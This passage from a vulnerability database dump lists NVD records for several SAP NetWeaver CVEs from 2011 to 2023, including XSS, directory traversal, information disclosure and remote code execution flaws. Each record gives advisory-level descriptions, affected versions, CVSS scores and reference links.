"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290."
},
{
"lang": "es",
"value": "El User Management Engine (UME) en SAP NetWeaver 7.4 permite a atacantes descifrar datos no especificados a trav\u00e9s de vectores desconocidos, tambi\u00e9n conocido como SAP Security Note 2191290."
}
],
"id": "CVE-2016-1910",
"lastModified": "2024-11-21T02:47:20.077",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": true,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-01-15T20:59:01.583",
"references": [
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2016/Apr/60"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/80920"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"source": "cve@mitre.org",
"url": "https://www.exploit-db.com/exploits/43495/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2016/Apr/60"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/80920"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-003-sap-netweaver-7-4-cryptographic-issues/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/press-center/blog/sap-security-notes-january-2016-review/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.exploit-db.com/exploits/43495/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-02-14 15:55
Modified
2024-11-21 02:05
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in ISpeakAdapter in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component 3.0, 7.00 through 7.02, and 7.10 through 7.11 for SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to PIP.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C6F215E9-6CD8-4D0A-9217-1DBBC2D7EAB1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"matchCriteriaId": "2794A7DB-D5B8-467E-93F4-D65245FF187D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.11:*:*:*:*:*:*:*",
"matchCriteriaId": "21A3F6A8-B060-48CE-841F-698F8F779191",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in ISpeakAdapter in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component 3.0, 7.00 through 7.02, and 7.10 through 7.11 for SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to PIP."
},
{
"lang": "es",
"value": "Vulnerabilidad de XSS en ISpeakAdapter en Integration Repository en el componente SAP Exchange Infrastructure (BC-XI) 3.0, 7.00 hasta 7.02 y 7.10 hasta 7.11 para SAP NetWeaver permite a atacantes remotos inyectar script Web o HTML arbitrarios a trav\u00e9s de vectores relacionados con PIP."
}
],
"id": "CVE-2014-1965",
"lastModified": "2024-11-21T02:05:22.077",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2014-02-14T15:55:07.830",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56947"
},
{
"source": "cve@mitre.org",
"url": "http://www.stechno.net/sap-notes.html?view=sapnote\u0026id=1442517"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91094"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1442517"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/56947"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.stechno.net/sap-notes.html?view=sapnote\u0026id=1442517"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91094"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1442517"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-05 23:15
Modified
2024-11-21 01:26
Severity ?
Summary
SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html | Broken Link | |
| cve@mitre.org | http://www.securityfocus.com/bid/53424 | Third Party Advisory, VDB Entry | |
| cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/75452 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html | Broken Link | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/53424 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/75452 | Third Party Advisory, VDB Entry |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash."
},
{
"lang": "es",
"value": "SAP NetWeaver versi\u00f3n 7.0, permite una ejecuci\u00f3n de c\u00f3digo remota y una denegaci\u00f3n de servicio causada por un error en la funci\u00f3n DiagTraceHex(). Mediante el env\u00edo de un paquete especialmente dise\u00f1ado, un atacante podr\u00eda explotar esta vulnerabilidad para causar que la aplicaci\u00f3n se bloquee."
}
],
"id": "CVE-2011-1517",
"lastModified": "2024-11-21T01:26:29.700",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-05T23:15:11.177",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/53424"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/53424"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-02-12 20:55
Modified
2024-11-21 01:34
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F59EAE32-F443-490E-9213-596430E406E7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"matchCriteriaId": "A35F93E3-FC19-4A52-885A-AA2112CAF34D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"matchCriteriaId": "ABEE6BE3-556F-4A1E-8FA3-CD5E5C1D42E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"matchCriteriaId": "73914503-E9AA-4382-85FC-B0DD45ABDD77",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter."
},
{
"lang": "es",
"value": "Vulnerabilidad de ejecuci\u00f3n de comandos en sitio remoto (XSS) en SAP/BW/DOC/METADATA de SAP NetWeaver permite a atacantes remotos inyectar secuencias de comandos web o HTML a trav\u00e9s del par\u00e1metro de p\u00e1gina."
}
],
"id": "CVE-2011-5260",
"lastModified": "2024-11-21T01:34:00.410",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2013-02-12T20:55:03.653",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=337"
},
{
"source": "cve@mitre.org",
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/520555/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=337"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/520555/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-06-13 03:15
Modified
2024-11-21 08:06
Severity ?
6.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Summary
SAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver (Design Time Repository) - version 7.50, returns an unfavorable content type for some versioned files, which could allow an authorized attacker to create a file with a malicious content and send a link to a victim in an email or instant message. Under certain circumstances, this could lead to Cross-Site Scripting vulnerability.\n\n"
}
],
"id": "CVE-2023-33984",
"lastModified": "2024-11-21T08:06:20.987",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.1,
"impactScore": 2.7,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-06-13T03:15:09.567",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3318657"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3318657"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "cna@sap.com",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2019-01-08 20:29
Modified
2024-11-21 04:16
Severity ?
Summary
Under certain conditions SAP Gateway of ABAP Application Server (fixed in SAP_GWFND 7.5, 7.51, 7.52, 7.53; SAP_BASIS 7.5) allows an attacker to access information which would otherwise be restricted.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | http://www.securityfocus.com/bid/106471 | Third Party Advisory, VDB Entry | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2723142 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/106471 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2723142 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "74F7C92A-48F7-456A-BDFF-91A482DE8546",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.51:*:*:*:*:*:*:*",
"matchCriteriaId": "8476AA24-8DB6-4BE2-A8F9-BFE26D2ECD6E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.52:*:*:*:*:*:*:*",
"matchCriteriaId": "72685658-D774-4E09-B963-EFB626779947",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "77CA44BC-8650-4A20-A359-0FE568E1B345",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:basis:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "E1AD0A9B-B8C0-495A-A792-591E0B12E5F2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Under certain conditions SAP Gateway of ABAP Application Server (fixed in SAP_GWFND 7.5, 7.51, 7.52, 7.53; SAP_BASIS 7.5) allows an attacker to access information which would otherwise be restricted."
},
{
"lang": "es",
"value": "Bajo ciertas condiciones, SAP Gateway of ABAP Application Server (solucionado en SAP_GWFND 7.5, 7.51, 7.52, 7.53; SAP_BASIS 7.5) permite que un atacante acceda a informaci\u00f3n que normalmente estar\u00eda restringida."
}
],
"id": "CVE-2019-0248",
"lastModified": "2024-11-21T04:16:34.790",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2019-01-08T20:29:00.970",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/106471"
},
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2723142"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/106471"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2723142"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=509151985"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-02-23 20:07
Modified
2024-11-21 01:36
Severity ?
Summary
Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de salto de directorio en la plataforma SAP NetWeaver v7.0 permite a usuarios remotos autenticados leer ficheros arbitrarios a trav\u00e9s de un .. (punto punto) en el par\u00e1metro logfilename a (1) b2b/admin/log.jsp o (2) b2b/admin/log_view.jsp en las ventas por Internet (crm.b2b), componente, o (3) ipc / admin log / . jsp o (4) los componentes del IPC / admin / log_view.jsp en la Administraci\u00f3n de aplicaciones (com.sap.ipc.webapp.ipc) .."
}
],
"id": "CVE-2012-1289",
"lastModified": "2024-11-21T01:36:46.600",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-02-23T20:07:25.860",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47861"
},
{
"source": "cve@mitre.org",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/73346"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47861"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/73346"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1585527"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-04-10 20:55
Modified
2024-11-21 02:00
Severity ?
Summary
An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver does not properly restrict access, which allows remote attackers to read and write to arbitrary files via unknown vectors.
References
{
